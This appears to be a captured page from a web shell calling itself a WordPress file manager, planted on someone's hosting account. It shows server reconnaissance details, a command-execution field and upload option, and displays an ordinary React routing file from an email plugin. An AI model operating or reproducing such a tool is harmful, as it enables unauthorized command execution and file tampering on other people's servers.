GRAYBYTE WORDPRESS FILE MANAGER6862

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/giriqfky/swamivivekananda.co.in/wp-content/plugins/suremails/src/routes/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/giriqfky/swamivivekananda.co.in/wp-content/plugins/suremails/src/routes//routes.js
import { Route, Routes, Navigate } from 'react-router-dom';
import { Connections } from '@screens/connections/index.js';
import { Logs } from '@screens/logs/index.js';
import { Dashboard } from '@screens/dashboard/index.js';
import { Notifications } from '@screens/notifications';
import { Settings } from '@screens/settings/index.js';
import {
	ConnectionProviders,
	OnboardingLayout,
	SafeGuard,
	Welcome,
	AddOns as OnboardingAddOns,
	Done,
} from '@screens/onboarding';
import AddOns from '@screens/add-ons/add-ons';

const ContentArea = () => {
	return (
		<div className="content-area w-full">
			<Routes>
				<Route path="/connections" element={ <Connections /> } />
				<Route path="/logs" element={ <Logs /> } />
				<Route path="/dashboard" element={ <Dashboard /> } />
				<Route path="/settings" element={ <Settings /> } />
				<Route path="/notifications" element={ <Notifications /> } />
				<Route path="/add-ons" element={ <AddOns /> } />
				<Route
					path="/"
					element={ <Navigate to="/dashboard" replace /> }
				/>
				<Route path="/onboarding" element={ <OnboardingLayout /> }>
					<Route
						index
						element={
							<Navigate to="/onboarding/welcome" replace />
						}
					/>
					<Route path="welcome" element={ <Welcome /> } />
					<Route
						path="connection"
						element={ <ConnectionProviders /> }
					/>
					<Route path="reputation-shield" element={ <SafeGuard /> } />
					<Route path="add-ons" element={ <OnboardingAddOns /> } />
					<Route path="done" element={ <Done /> } />
				</Route>
			</Routes>
		</div>
	);
};

export default ContentArea;

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 10 2025 04:32:27
giriqfky / giriqfky
0755
.htaccess
0.41 KB
July 10 2025 04:32:27
giriqfky / giriqfky
0644
routes.js
1.564 KB
June 23 2025 07:12:38
giriqfky / giriqfky
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF